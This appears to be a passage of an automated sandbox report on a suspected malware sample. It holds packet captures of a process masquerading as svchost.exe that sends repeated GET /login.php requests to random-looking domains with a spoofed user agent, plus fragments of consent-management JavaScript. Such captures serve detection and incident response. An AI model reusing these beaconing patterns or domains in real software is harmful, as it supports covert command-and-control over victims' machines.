                                                                                                                                                                                                          Data Ascii: ges" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang"
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324444056 CET70INData Raw: 68 2e 73 75 62 73 74 72 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d
                                                                                                                                                                                                          Data Ascii: h.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324537992 CET1236INData Raw: 64 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 65 7d 7d 69 66 28 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 21 3d 2d 31 29 7b
                                                                                                                                                                                                          Data Ascii: d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:locat
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324565887 CET1236INData Raw: 30 29 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 70 61 6e 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d
                                                                                                                                                                                                          Data Ascii: 0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugu
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324613094 CET1236INData Raw: 6f 6c 65 22 2c 22 6e 6f 6e 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 65 6c 73 65 7b 77 69 6e
                                                                                                                                                                                                          Data Ascii: ole","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324625015 CET636INData Raw: 22 74 63 66 63 61 22 2c 22 75 73 6e 61 74 22 2c 22 75 73 63 61 22 2c 22 75 73 76 61 22 2c 22 75 73 63 6f 22 2c 22 75 73 75 74 22 2c 22 75 73 63 74 22 5d 2c 63 6d 70 49 64 3a 33 31 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 73 74 75 62 3d
                                                                                                                                                                                                          Data Ascii: "tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g=a[0];var f=a.length>1?a[1]:null;var e=a.length>2?a[2]:null;if(g==="ping"){retur
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324770927 CET1236INData Raw: 3d 65 29 7b 5f 5f 67 70 70 2e 65 5b 64 5d 2e 73 70 6c 69 63 65 28 64 2c 31 29 3b 68 3d 74 72 75 65 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 6d 6f 76 65 64 22 2c 6c 69 73 74 65 6e
                                                                                                                                                                                                          Data Ascii: =e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingDa
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.329663992 CET1236INData Raw: 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 67 70 70 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 67 70 70 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 67 70 70
                                                                                                                                                                                                          Data Ascii: f(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parame


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.849707154.212.231.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.956163883 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.876477003 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.890208960 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503927946 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504236937 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.038609028 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.425607920 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.548175097 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.912127972 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.84970823.253.46.64801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.978677034 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.431714058 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:00 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.432348967 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.849709188.114.96.3801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.045310020 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503948927 CET963INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1zvQOqfAVfMcm9jnSq95fMr55U5EhSwjZTZius3G1jTow57gBPFd%2BvjUy%2FH0QHR%2FiUak35l6vSxW90HMTEFbov1CiBj6MuexknAhZvAJWX0jXb5xyaANGEh6RmS7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff94dfcd03905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11716&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503962040 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503972054 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.972210884 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.341226101 CET975INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:08 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJq%2F%2FQO7HXKFLWjXQvM629mNBO9aywrlErL%2FsC5xitbkmSNDT0aXf92PpSeoAvsWDh2pWQUpXLsxEsIqnlvyD5xUKugXk8rhGxirlSIjsku6JluCfzPW7ntELbaMig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff95e195c3905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=241958&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
